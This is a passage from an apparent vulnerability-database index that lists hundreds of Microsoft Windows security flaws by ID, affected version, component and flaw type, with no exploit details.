SP1/8/8.1 Windows Media Center privilege escalation [77613] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll privilege escalation [77042] Microsoft Windows up to Vista Filesystem privilege escalation [77041] Microsoft Windows up to Vista Registry privilege escalation [77040] Microsoft Windows up to Vista Object Manager privilege escalation [77039] Microsoft Windows up to Vista WebDAV SSL weak encryption [77038] Microsoft Windows Server 2008 SP2 UDDI Services cross site scripting [77037] Microsoft Windows Server 2012/Server 2012 R2 System Center Operations Manager cross site scripting [77035] Microsoft Windows up to Vista Server Message Block memory corruption [77034] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77033] Microsoft Windows up to Vista Remote Desktop Session Host privilege escalation [77032] Microsoft Windows up to Vista XML Core Services weak encryption [77031] Microsoft Windows up to Vista XML Core Services information disclosure [77030] Microsoft Windows up to Vista XML Core Services weak encryption [77029] Microsoft Windows up to Vista Shell Security Feature privilege escalation [77028] Microsoft Windows up to Vista KMD Security Feature privilege escalation [77027] Microsoft Windows up to Vista CSRSS privilege escalation [77026] Microsoft Windows up to Vista ASLR information disclosure [77025] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77024] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77023] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77022] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77021] Microsoft Windows up to Vista TrueType Font Parser privilege escalation [77020] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77019] Microsoft Windows up to Vista OpenType Font Parser Code [77018] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77017] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77016] Microsoft Windows up to Vista OpenType Font Parser privilege escalation [77015] Microsoft Windows up to Vista OpenType Font Parser Data Processing Error [76756] Microsoft Windows up to Vista SP2 Adobe Type Manager Library atmfd.dll memory corruption [76493] Microsoft Windows up to Vista SP2 OLE privilege escalation [76492] Microsoft Windows up to Vista SP2 OLE privilege escalation [76461] Microsoft Windows up to Server 2012 R2 Domain-Controller Communication Credentials information disclosure [76460] Microsoft Windows 7 SP1/8/Server 2012 RDP Server Service Data Processing Error [76449] Microsoft Windows 8/8.1/Server 2008/Server 2012/Server 2012 R2 Hyper-V 7PK Security Features [76448] Microsoft Windows 8.1/Server 2012 R2 Hyper-V memory corruption [75783] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services cross site scripting [75782] Microsoft Windows up to Vista Common Controls memory corruption [75760] Microsoft Windows Media Player 10/11/12 DataObject Code [75335] Microsoft Windows up to Vista SP2 Service Control Manager privilege escalation [75328] Microsoft Windows up to Vista Management Console memory corruption [75327] Microsoft Windows up to Vista SP2 Schannel weak encryption [75304] Microsoft Windows up to Vista SP2 TrueType Font Parser Data Processing Error [75303] Microsoft Windows up to Vista SP2 OpenType Font Parser information disclosure [75285] Microsoft Windows up to Vista SP2 Journal privilege escalation [75284] Microsoft Windows up to Vista SP2 Journal privilege escalation [75283] Microsoft Windows up to Vista SP2 Journal privilege escalation [75282] Microsoft Windows up to Vista SP2 Journal privilege escalation [75281] Microsoft Windows up to Vista SP2 Journal privilege escalation [75280] Microsoft Windows up to Vista SP2 Journal privilege escalation [74842] Microsoft Windows 8.1/Server 2012 R2 Hyper-V privilege escalation [74840] Microsoft Windows up to Vista EMF File privilege escalation [74834] Microsoft Windows Server 2012 R2 Active Directory Federation Services 3.0 privilege escalation [74833] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 HTTP Request HTTP.sys privilege escalation [74104] Microsoft Windows up to Vista Digital Certificate weak authentication [74022] Microsoft Windows up to Vista Certificate weak authentication [73972] Microsoft Windows up to Vista SP2 PNG Parser information disclosure [73963] Microsoft Windows up to Vista SP2 Photo Decoder information disclosure [73961] Microsoft Windows 7 SP1/8/8.1/Server 2012/Server 2012 R2 Remote Desktop Protocol Object Management denial of service [73960] Microsoft Windows Netlogon Service User 7PK Security Features [73959] Microsoft Windows up to Vista SP2 DLL Data Processing Error [73958] Microsoft Windows up to Vista SP2 Text Services Data Processing Error [73957] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73956] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73955] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73954] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73953] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73952] Microsoft Windows up to Vista Adobe Font Driver privilege escalation [73951] Microsoft Windows up to Vista Adobe Font Driver information disclosure [73950] Microsoft Windows up to Vista Adobe Font Driver memory corruption [73938] Microsoft Windows VBScript Scripting Engine denial of service [69258] Microsoft Windows up to Vista Secure Channel FREAK weak encryption [69161] Microsoft Windows up to Vista information disclosure [69160] Microsoft Windows up to Server 2012 Process privilege escalation [69159] Microsoft Windows up to Vista Group Policy 7PK Security Features [69154] Microsoft Windows up to Vista Group Policy weak authentication [69153] Microsoft Windows up to Vista Font Mapper win32k.sys privilege escalation [69152] Microsoft Windows up to Vista True Type Font win32k.sys privilege escalation [69151] Microsoft Windows up to Vista Kernel-Mode Driver win32k.sys memory corruption [69150] Microsoft Windows up to Vista win32k.sys privilege escalation [69149] Microsoft Windows up to Vista Cryptography Next Generation cng.sys information disclosure [69148] Microsoft Windows up to Vista Win32k.sys privilege escalation [68596] Microsoft Windows Internet Authentication Service denial of service [68593] Microsoft Windows up to Server 2012 Network Location Awareness Service privilege escalation [68590] Microsoft Windows up to Vista TS WebProxy directory traversal [68589] Microsoft Windows up to Vista Telnet Server memory corruption [66827] Microsoft Windows Media Player 11.0.5721.5230 memory corruption [66445] Microsoft Windows 8.0/8.1 XMLDOM ActiveX Control privilege escalation [65723] Microsoft Windows Authenticode WinVerifyTrust privilege escalation [62913] Microsoft Windows up to XP SP3 Shell Numeric Error [61648] Microsoft Windows XP privilege escalation [60245] Microsoft Windows unknown vulnerability [60209] Microsoft Windows msvcrt.dll memory corruption [60065] Microsoft Windows 2000 mod_sql information disclosure [59391] Microsoft Windows memory corruption [59006] Microsoft Windows Media Center TV Pack memory corruption [59004] Microsoft Windows memory corruption [58991] Microsoft Windows XP memory corruption [58238] Microsoft Windows Data Access Components memory corruption [58236] Microsoft Windows TCP/IP Stack denial of service [57812] Microsoft Windows XP lots-of-polys-example.html privilege escalation [57692] Microsoft Windows XP denial of service [57085] Microsoft Windows msgsc.dll memory corruption [57080] Microsoft Windows privilege escalation [57014] Microsoft Windows Default Configuration [56779] Microsoft Windows Stream Buffer Engine SBE.dll privilege escalation [56598] Microsoft Windows Azure Sdk up to 1.2 privilege escalation [56383] Microsoft Windows privilege escalation [56176] Microsoft Windows 7/Server 2003/XP fxscover.exe CDrawPoly::Serialize memory corruption [55937] Microsoft Windows XP denial of service [55777] Microsoft Windows Movie Maker 2.6 memory corruption [55776] Microsoft Windows memory corruption [55775] Microsoft Windows Media Encoder 9 memory corruption [54982] Microsoft Windows 7/Vista SP2 denial of service [54981] Microsoft Windows R2 privilege escalation [54718] Microsoft Windows up to XP SP3 Print Spooler EmeraldThread privilege escalation [54717] Microsoft Windows privilege escalation [54555] Microsoft Windows 6.00.2900.5512 wab.exe memory corruption [54553] Microsoft Windows sdclt.exe weak encryption [54552] Microsoft Windows smmscrpt.dll memory corruption [54551] Microsoft Windows contact memory corruption [54547] Microsoft Windows grpconv.exe memory corruption [54342] Microsoft Windows privilege escalation [54341] Microsoft Windows Movie Maker 2.1 privilege escalation [54334] Microsoft Windows privilege escalation [54333] Microsoft Windows denial of service [54332] Microsoft Windows privilege escalation [53591] Microsoft Windows Server 2003 GetServerName cross site scripting [53511] Microsoft Windows privilege escalation [53207] Microsoft Windows Graphics Driver cdd.dll Numeric Error [53104] Microsoft Windows smtpsvc.dll privilege escalation [53103] Microsoft Windows smtpsvc.dll weak encryption [52780] Microsoft Windows cabview.dll privilege escalation [52776] Microsoft Windows SMB Client denial of service [52775] Microsoft Windows denial of service [52774] Microsoft Windows SMB Client privilege escalation [52753] Microsoft Windows information disclosure [52336] Microsoft Windows denial of service [52283] Microsoft Windows Media Player 11.0.5721.5145 memory corruption [52036] Microsoft Windows 2000 MsgBox memory corruption [51997] Microsoft Windows Media Player 9 memory corruption [51811] Microsoft Windows max3activex.dll privilege escalation [51809] Microsoft Windows denial of service [51808] Microsoft Windows privilege escalation [51807] Microsoft Windows privilege escalation [51806] Microsoft Windows privilege escalation [51804] Microsoft Windows weak encryption [51803] Microsoft Windows denial of service [51796] Microsoft Windows privilege escalation [51795] Microsoft Windows race condition [51794] Microsoft Windows privilege escalation [51793] Microsoft Windows race condition [51497] Microsoft Windows Live Messenger 2009 ActiveX Control msnmsgr.exe denial of service [51135] Microsoft Windows ir32_32.dll memory corruption [51134] Microsoft Windows privilege escalation [51133] Microsoft Windows 2000 SP4/Server 2003 SP2/SP3/XP SP2 privilege escalation [51132] Microsoft Windows memory corruption [51128] Microsoft Windows privilege escalation [51078] Microsoft Windows denial of service [51077] Microsoft Windows privilege escalation [51076] Microsoft Windows denial of service [51075] Microsoft Windows privilege escalation [51073] Microsoft Windows weak authentication [50811] Microsoft Windows denial of service [50786] Microsoft Windows 2000 llssrv.exe memory corruption [50785] Microsoft Windows privilege escalation [50783] Microsoft Windows privilege escalation [50451] Microsoft Windows GDI+ Numeric Error [50449] Microsoft Windows EducatedScholar privilege escalation [50448] Microsoft Windows privilege escalation [50447] Microsoft Windows privilege escalation [50446] Microsoft Windows Media Player 6.4 memory corruption [50445] Microsoft Windows EducatedScholar denial of service [50444] Microsoft Windows Local Security Authority Subsystem Service Numeric Error [50439] Microsoft Windows Numeric Error [50438] Microsoft Windows weak encryption [50431] Microsoft Windows privilege escalation [50430] Microsoft Windows privilege escalation [50429] Microsoft Windows privilege escalation [49866] Microsoft Windows Server 2003 privilege escalation [49745] Microsoft Windows Server 2003 denial of service [49434] Microsoft Windows 7 denial of service [49394] Microsoft Windows Server 2003 privilege escalation [49393] Microsoft Windows privilege escalation [49392] Microsoft Windows memory corruption [49391] Microsoft Windows Avifil32.dll Numeric Error [49046] Microsoft Windows Server 2003 quartz.dll privilege escalation [49045] Microsoft Windows Server 2003 quartz.dll privilege escalation [48894] Microsoft Windows Server 2003 msvidctl.dll privilege escalation [48517] Microsoft Windows 2000 denial of service [48516] Microsoft Windows Server 2008 privilege escalation [48513] Microsoft Windows Search 4.0 cross site scripting [48512] Microsoft Windows Server 2008 privilege escalation [48033] Microsoft Windows XP denial of service [47804] Microsoft Windows Media Player 11.0.5721.5260 Numeric Error [47719] Microsoft Windows 2000 memory corruption [47717] Microsoft Windows privilege escalation [47715] Microsoft Windows 2000 Wordpad memory corruption [47465] Microsoft Windows GDI+ gdiplus.dll GpFont::SetData Numeric Error [47464] Microsoft Windows unlzh.c memory corruption [47091] Microsoft Windows Server 2008 privilege escalation [47090] Microsoft Windows Server 2008 privilege escalation [47089] Microsoft Windows weak authentication [46637] Microsoft Windows DNS Server denial of service [46620] Microsoft Windows Live Messenger 2009 msnmsgr.exe privilege escalation [46007] Microsoft Windows Mobile 6.0 FTP Service directory traversal [45911] Microsoft Windows Domain Controller privilege escalation [45907] Microsoft Windows XP chm memory corruption [45905] Microsoft Windows privilege escalation [45904] Microsoft Windows memory corruption [45763] Microsoft Windows Live Messenger up to 8.5.1 information disclosure [45676] Microsoft Windows Media Player 9 quartz.dll Numeric Error [45381] Microsoft Windows Server 2008/Vista SP1 Explorer denial of service [45380] Microsoft Windows Server 2008/Vista SP1 Search denial of service [45378] Microsoft Windows Media Player up to 6.4 information disclosure [45377] Microsoft Windows Media Format Runtime up to 9.5 privilege escalation [45197] Microsoft Windows 2000 nskey.dll memory corruption [45129] Microsoft Windows Live Messenger denial of service [45063] Microsoft Windows Server 2003 Active Directory information disclosure [44860] Microsoft Windows Media Player up to 9 privilege escalation [44533] Microsoft Windows 2000 mqsvc.exe privilege escalation [44249] Microsoft Windows XP SP3 gdiplus.dll Numeric Error [44246] Microsoft Windows XP SP3 denial of service [44227] Microsoft Windows Mobile 6.0 Bluetooth privilege escalation [44069] Microsoft Windows denial of service [43982] Microsoft Windows Image Acquisition Logger ActiveX Control privilege escalation [43953] Microsoft Windows ActiveX Control wmex.dll memory corruption [43676] Microsoft Windows 2000/Server 2003/Vista/XP privilege escalation [43675] Microsoft Windows 2000/Server 2003/Vista/XP of privilege escalation [43659] Microsoft Windows Messenger 5.1 ActiveX Control information disclosure [43658] Microsoft Windows XP SP2 nslookup.exe privilege escalation [43102] Microsoft Windows 2000 SP4/Server 2003 SP2/Server 2008 DNS unknown vulnerability [42732] Microsoft Windows Server 2003/Vista/XP privilege escalation [42731] Microsoft Windows Server 2003 privilege escalation [42638] Microsoft Windows Installer 3.1.4000.1823 ActiveX Control msiexec.exe memory corruption [42328] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [42327] Microsoft Windows Live Onecare 1.1.3520.0 Malware Protection Engine mpengine.dll denial of service [41879] Microsoft Windows 2000/Server 2003/Vista memory corruption [41878] Microsoft Windows 2000/Server 2003/Vista weak authentication [41877] Microsoft Windows Server 2003 vbscript.dll privilege escalation [41656] Microsoft Windows privilege escalation [40987] Microsoft Windows 2000 privilege escalation [40986] Microsoft Windows Vista denial of service [40416] Microsoft Windows XP memory corruption [39937] Microsoft Windows Media Player 11 Numeric Error [39769] Microsoft Windows 2000 cryptgenrandom information disclosure [39749] Microsoft Windows 2000 msjet40.dll memory corruption [39655] Microsoft Windows Server 2003 Configuration [39324] Microsoft Windows Mobile 2005 SMS privilege escalation [39013] Microsoft Windows XP explorer.exe memory corruption [39012] Microsoft Windows Live Messenger up to 8.1 doc memory corruption [38999] Microsoft Windows Server 2003 explorer.exe denial of service [38962] Microsoft Windows Media Player 9 privilege escalation [38332] Microsoft Windows Gadgets memory corruption [38329] Microsoft Windows cross site scripting [38328] Microsoft Windows memory corruption [38326] Microsoft Windows 2000 attemptwrite Numeric Error [38272] Microsoft Windows Media Player 11 wmplayer.exe denial of service [38246] Microsoft Windows denial of service [37736] Microsoft Windows Vista unknown vulnerability [37526] Microsoft Windows 2000/Server 2003 denial of service [37251] Microsoft Windows 2000 memory corruption [37157] Microsoft Windows XP Graphics Device Interface gdiplus.dll denial of service [37093] Microsoft Windows Server 2003 Error Message unknown vulnerability [36515] Microsoft Windows 2000/Server 2003/XP memory corruption [36086] Microsoft Windows XP SP1 BMP Image Integer Coercion Error [36052] Microsoft Windows 2000 memory corruption [36002] Microsoft Windows 2000/XP denial of service [35900] Microsoft Windows up to Vista GDI memory corruption [35846] Microsoft Windows 2000/Server 2003 Default Configuration [35822] Microsoft Windows Proxy Server denial of service [35708] Microsoft Windows Vista Teredo Address privilege escalation [35707] Microsoft Windows Vista Meeting Space dfsr.exe unknown vulnerability [35706] Microsoft Windows Vista weak authentication [35705] Microsoft Windows Vista weak authentication [35704] Microsoft Windows Vista/XP ARP denial of service [35703] Microsoft Windows Vista LLTD Mapper denial of service [35702] Microsoft Windows Vista LLTD Responder weak authentication [35701] Microsoft Windows Vista LLTD Mapper weak authentication [35700] Microsoft Windows Vista LLTD Mapper weak authentication [35654] Microsoft Windows XP winmm.dll mmioread denial of service [35514] Microsoft Windows Explorer ole32.dll memory corruption [35206] Microsoft Windows Server 2003/XP denial of service [34994] Microsoft Windows 2000 OLE Dialog memory corruption [34967] Microsoft Windows Mobile 5.0 denial of service [34804] Microsoft Windows Mobile 5.0 memory corruption [34794] Microsoft Windows Vista Speech Recognition sapi.dll privilege escalation [34793] Microsoft Windows Mobile 5.0 denial of service [34690] Microsoft Windows Explorer 6.0.2900.2180 explorer.exe denial of service [34207] Microsoft Windows Mobile Pocket PC Bluetooth Stack unknown vulnerability [34206] Microsoft Windows Bluetooth Stack unknown vulnerability [34038] Microsoft Windows Event Viewer eventvwr.exe unknown vulnerability [33890] Microsoft Windows XP SP2 Explorer explorer.exe denial of service [33889] Microsoft Windows Media Player 10.00.00.4036 denial of service [33795] Microsoft Windows Media Player 6.4 memory corruption [33589] Microsoft Windows Live Messenger up to 8.0 denial of service [32899] Microsoft Windows Digital Rights Management drmstor.dll storelicense memory corruption [32694] Microsoft Windows 2000 privilege escalation [31797] Microsoft Windows File Viewer winhlp32.exe memory corruption [31736] Microsoft Windows XP gdiplus.dll denial of service [31521] Microsoft Windows NT 4.0/2000/XP IP Stack denial of service [31236] Microsoft Windows information disclosure [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [31024] Microsoft Windows Live Messenger 8.0 memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30799] Microsoft Windows 98/ME Rendering Engine polypolygon Numeric Error [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29471] Microsoft Windows Help winhlp32.exe memory corruption [29383] Microsoft Windows XP unknown vulnerability [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27224] Microsoft Windows up to 1999 denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26923] Microsoft Windows XP Administrator Account unknown vulnerability [26618] Microsoft Windows 2000/XP Subsystem memory corruption [26535] Microsoft Windows Distributed Transaction Coordinator msdtcprx.dll ndrallocate privilege escalation [26534] Microsoft Windows denial of service [26523] Microsoft Windows 95/98/ME/NT 4.0 Terminal Service unknown vulnerability [26519] Microsoft Windows 95/98/ME/NT 4.0 Chart widechartomultibyte memory corruption [26517] Microsoft Windows 95/98/ME/NT 4.0 Certificates unknown vulnerability [26516] Microsoft Windows 95/98/ME/NT 4.0 Active Directory unknown vulnerability [26515] Microsoft Windows 95/98/ME/NT 4.0 Access Control List unknown vulnerability [25708] Microsoft Windows unknown vulnerability [25515] Microsoft Windows orun32.exe memory corruption [25513] Microsoft Windows XP Services for UNIX unknown vulnerability [25509] Microsoft Windows msasn1.dll memory corruption [25400] Microsoft Windows 98SE user32.dll denial of service [25399] Microsoft Windows XP denial of service [25256] Microsoft Windows XP denial of service [25185] Microsoft Windows Media Player ME unknown vulnerability [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24746] Microsoft Windows 2000/ME Explorer denial of service [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [23410] Microsoft Windows XP Utility Manager denial of service [22675] Microsoft Windows winhlp32.exe memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22560] Microsoft Windows Media Player 9.0 getiteminfobyatom unknown vulnerability [68403] Microsoft Windows up to Vista information disclosure [68239] Microsoft Windows up to Vista Kerberos KDC EsikmoRoll privilege escalation [68196] Microsoft Windows up to Vista TrueType Array Index denial of service [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68192] Microsoft Windows up to Vista Remote Desktop Protocol weak authentication [68190] Microsoft Windows up to Vista Audio Service privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68184] Microsoft Windows up to Vista privilege escalation [68183] Microsoft Windows up to Vista Schannel privilege escalation [68165] Microsoft Windows up to XP OLE Automation Array OleAut32.dll SafeArrayDimen privilege escalation [68045] Microsoft Windows up to Vista SP2 OLE privilege escalation [67827] Microsoft Windows up to Vista win32k.sys privilege escalation [67826] Microsoft Windows up to Vista TrueType Font win32k.sys privilege escalation [67822] Microsoft Windows up to Vista OLE Object Packager packager.dll privilege escalation [67806] Microsoft Windows up to Vista TrueType Font privilege escalation [67362] Microsoft Windows up to Server 2012 R2 Remote Procedure Call denial of service [67326] Microsoft Windows Media Center MCPlayer.dll CSyncBasePlayer denial of service [67030] Microsoft Windows up to Vista Certificates weak authentication [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [66987] Microsoft Windows up to Vista Journal Parser privilege escalation [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21926] Microsoft Windows XP Help Center HelpCtr.exe unknown vulnerability [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21751] Microsoft Windows Media Services 4.1 TCP/IP Packet denial of service [21548] Microsoft Windows Media Player 9/ME PNG Image memory corruption [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20815] Microsoft Windows Distributed Component Object Model Interface memory corruption [20770] Microsoft Windows Media Player 7/8 IFRAME Tag privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20485] Microsoft Windows NT 4.0/2000 Media Services nsiislog.dll memory corruption [20307] Microsoft Windows NT 4.0/2000/XP RPC Endpoint Mapper denial of service [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20182] Microsoft Windows ME Help/Support Center cross site scripting [20108] Microsoft Windows NT 4.0/2000/XP Terminal Server memory corruption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19759] Microsoft Windows XP ISAKMP Service denial of service [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19574] Microsoft Windows 2000/XP Log Size denial of service [19490] Microsoft Windows Media Player up to 7.1 MP3 File Name mplay32.exe memory corruption [19355] Microsoft Windows 2000 TCP Packet denial of service [19315] Microsoft Windows XP Internet Explorer 6.0 privilege escalation [19261] Microsoft Windows XP Shell memory corruption [19231] Microsoft Windows XP Domain Controller unknown vulnerability [19194] Microsoft Windows 98/NT 4.0 Certificate weak authentication [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19063] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19062] Microsoft Windows NT 4.0/2000/XP Sun RPC Library Services denial of service [19061] Microsoft Windows 98/ME/XP ZIP Archive privilege escalation [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [19043] Microsoft Windows NT 4.0/2000/XP CHM File memory corruption [19042] Microsoft Windows NT 4.0/2000/XP HTML Help ActiveX Control hhctrl.ocx alink memory corruption [18814] Microsoft Windows 98/98SE/ME/XP Crypto API weak authentication [18810] Microsoft Windows up to XP Certificate Enrollment ActiveX Control unknown vulnerability [18782] Microsoft Windows XP Help/Support Center uplddrvinfo.htm File denial of service [18772] Microsoft Windows NT 4.0/2000 SMB memory corruption [18709] Microsoft Windows HTML Help ActiveX Control Winhlp32.exe memory corruption [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18395] Microsoft Windows Media Player 7.1 information disclosure [18351] Microsoft Windows Media Player 6.4/7.1 WMA Media File privilege escalation [18325] Microsoft Windows Media Player 8.00.00.4477 WMF File privilege escalation [18276] Microsoft Windows 2000 LANMAN Service denial of service [18214] Microsoft Windows XP TCP SYN denial of service [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17958] Microsoft Windows up to XP SNMP Agent Service memory corruption [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17890] Microsoft Windows XP Remote Desktop Client weak encryption [17871] Microsoft Windows ME SSDP Service ssdpsrv.exe denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17761] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17760] Microsoft Windows 98/98SE/ME/XP UPnP memory corruption [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17660] Microsoft Windows 98/98SE/ME/XP UPnP denial of service [17658] Microsoft Windows Media Player up to 7.1 ASF File memory corruption [17655] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17608] Microsoft Windows XP Help Center helpctr.exe memory corruption [17572] Microsoft Windows NT 4.0 RPC Endpoint Mapper denial of service [17567] Microsoft Windows NT 4.0/2000 Terminal Server denial of service [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17373] Microsoft Windows NT 4.0/2000 NNTP Service denial of service [17372] Microsoft Windows Media Player 6.4/7.0/7.1 NSC File memory corruption [17371] Microsoft Windows NT 4.0/2000 RPC Server denial of service [17310] Microsoft Windows NT 4.0/2000 DNS Server weak authentication [17266] Microsoft Windows NT 4.0 LsaQueryInformationPolicy information disclosure [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17099] Microsoft Windows 98/98SE ARP denial of service [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17051] Microsoft Windows NT 4.0/2000 Visual Studio RAD fp30reg.dll memory corruption [17049] Microsoft Windows 2000 Message Request denial of service [16826] Microsoft Windows Media Player 6.4/7.0 Shortcut privilege escalation [16825] Microsoft Windows Media Player 6.3/6.4/7.0 ASX File memory corruption [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16706] Microsoft Windows Media Player 7 WMP ActiveX Control privilege escalation [16677] Microsoft Windows 98/2000 Java Applet denial of service [16600] Microsoft Windows 2000 Event Viewer memory corruption [16540] Microsoft Windows Media Player 7 Skin skin.wmz privilege escalation [16510] Microsoft Windows NT 4.0 PPTP Server denial of service [16457] Microsoft Windows NT 4.0 MTS Package Registry privilege escalation [16417] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16305] Microsoft Windows NT 4.0 Terminal Server RegAPI.DLL memory corruption [16269] Microsoft Windows Media Player 6.4/7.0 ASX File memory corruption [16267] Microsoft Windows 2000 Telnet Service denial of service [16238] Microsoft Windows 95/98/98SE/NT 4.0 TCP Connection denial of service [16232] Microsoft Windows CE 3.0.9348 Initial Sequence Number weak authentication [16212] Microsoft Windows NT 4.0/2000 SMBnegprots Request denial of service [16191] Microsoft Windows 95/98/98SE/ME NMPI Listener denial of service [16190] Microsoft Windows 95/98/98SE/ME File/Print Sharing Service weak authentication [16140] Microsoft Windows Media Player 7 OCX Control denial of service [16098] Microsoft Windows NT 4.0 Cenroll ActiveX Control xenroll.dll denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [16024] Microsoft Windows 95/98/98SE NetBIOS Client denial of service [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15980] Microsoft Windows Media Services 4.0/4.1 Unicast Service denial of service [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15884] Microsoft Windows 95/98 IPX Packet denial of service [15805] Microsoft Windows 95/98/NT 4.0/2000 NetBIOS weak authentication [15802] Microsoft Windows NT 4.0/2000 NetBIOS Name Server denial of service [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15722] Microsoft Windows 95/98/NT 4.0 ARP Table weak authentication [15644] Microsoft Windows NT 4.0 Remote Registry Request denial of service [15628] Microsoft Windows NT 4.0/2000 DCE/RPC Request SMBwriteX denial of service [15607] Microsoft Windows Media Services 4.0/4.1 Encoder Request denial of service [15593] Microsoft Windows 95/98/NT 4.0/2000 CIFS Computer Browser denial of service [15592] Microsoft Windows NT 4.0 CIFS Computer Browser denial of service [15575] Microsoft Windows 95/98/NT 4.0/2000 IP Fragmentation Jolt2 denial of service [15554] Microsoft Windows NT 4.0 Service Control Manager denial of service [15512] Microsoft Windows 95/98 NetBIOS denial of service [15475] Microsoft Windows NT 4.0/2000 cmd.exe memory corruption [15455] Microsoft Windows 98/XP/NT 4.0/2000 Domain Name Resolver weak authentication [15397] Microsoft Windows Media Rights Manager 4.0/4.1 denial of service [15341] Microsoft Windows Media Services 4.0/4.1 Handshake denial of service [15325] Microsoft Windows 2000 Share weak authentication [15188] Microsoft Windows NT 3.5/4.0 RSH Service Utility .rhosts privilege escalation [15177] Microsoft Windows NT 4.0/2000 Policy privilege escalation [15160] Microsoft Windows NT 4.0 SP2 Password Complexity passfilt.dll weak authentication [15147] Microsoft Windows NT 4.0 Netbt.sys denial of service [15142] Microsoft Windows NT 4.0 ICMP Subnet Mask denial of service [15140] Microsoft Windows NT 4.0 Routing Information Field denial of service [15139] Microsoft Windows NT 4.0 RPC denial of service [15135] Microsoft Windows 95 Remote Administration privilege escalation [15122] Microsoft Windows NT 4.0 SNMP Agent denial of service [15066] Microsoft Windows NT 4.0 Local Security Authority Subsystem LsaLookupSids privilege escalation [15065] Microsoft Windows NT 4.0 Keystream privilege escalation [15011] Microsoft Windows NT 4.0/2000 NTMail privilege escalation [15003] Microsoft Windows 95/98 Credential privilege escalation [14987] Microsoft Windows NT System Policy weak authentication [14986] Microsoft Windows 98/NT 4.0/2000 Wordpad memory corruption [14976] Microsoft Windows Media Player ActiveX Control File information disclosure [14974] Microsoft Windows 95/98 Network privilege escalation [14921] Microsoft Windows NT 4.0 LSA lsass.exe denial of service [14849] Microsoft Windows 